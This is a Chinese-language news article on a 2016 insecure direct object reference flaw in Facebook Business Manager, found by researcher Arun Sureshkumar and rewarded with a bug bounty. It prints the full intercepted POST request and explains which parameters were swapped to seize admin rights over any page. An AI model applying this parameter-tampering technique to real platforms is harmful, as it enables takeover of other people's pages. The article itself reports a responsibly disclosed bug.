探究 | 10秒內攻破FaceBook頁面需要什麼秘訣?
一個印度研究員發現了Facebook商業管理系統的嚴重漏洞,能夠用來攻擊任何頁面。
印度研究員 Arun Sureshkumar 發現了Facebook商業管理系統一個嚴重漏洞,能夠用來攻擊任何頁面。
商業管理系統是客戶用來管理用戶資產的組件,包括頁面和廣告賬號,Facebook商業管理系統允許超級管理員共享頁面和賬號的許可權。
在分析這項技術之前,我先介紹一下不安全直接對象引用的概念。根據OWASP項目提供的定義,當應用提供基於用戶輸入的直接對象訪問時會產生不安全的直接對象引用。這個漏洞能夠讓攻擊者繞過認證直接訪問系統的資源。
「不安全對象引用允許攻擊者繞過認證直接訪問資源,通過修改直接指向對象參數的值。這些資源可能是資料庫,文件系統等等。這將導致用戶通過輸入可以檢索對象並且不需要認證校驗」摘自OWASP。n
Sureshkumar 利用Facebook商業管理系統的IDOR漏洞能在10秒內拿下任何Facebook的頁面。
Sureshkumar用他的Facebook賬號 (ID=907970555981524) 添加了一個合作夥伴,他用的測試賬號 ID 為991079870975788。攻擊者用Burp Suit來截獲請求,這個工具能夠修改請求。
下面是攻擊者公布的請求:
POST/business_share/asset_to_agency/?dpr=2 HTTP/1.1nHost: business.facebook.comnConnection: closenContent-Length: 436nOrigin: https://business.facebook.comnUser-Agent: Mozilla/5.0 (Macintosh;Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/52.0.2743.116 Safari/537.36nContent-Type:application/x-www-form-urlencodednAccept: */*nReferer:https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524nAccept-Encoding: gzip, deflate, brnAccept-Language: en-US,en;q=0.8nCookie: rc=2;datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n;lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837;fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I;csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2;presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC;act=1472469233458%2F6nparent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733n
他修改目標頁面『asset id』的值,同時交換『parent_business_id』和『agency_id』的值。同時將角色更改為』MANAGER』。
通過這個簡單的修改,Sureshkumar演示了攻擊Facebook頁面是可能的。他獲取了管理員許可權。
安全專家在2016年8月29號向Facebook報告了這個漏洞,Facebook研究了這個漏洞並由此發現了平台上的另一個漏洞。Sureshkumar 因此也獲得了16000美元的獎勵。
註:本文參考來源於softpedia
推薦閱讀:
※乾貨 | malware新姿勢:使用Windows管理規範逃避安全檢測
※新型MacOS勒索軟體:正在偽裝成PS軟體傳播
※「點開我的鏈接我就能控制你的電腦」之Facebook Messenger版(需安裝軟體)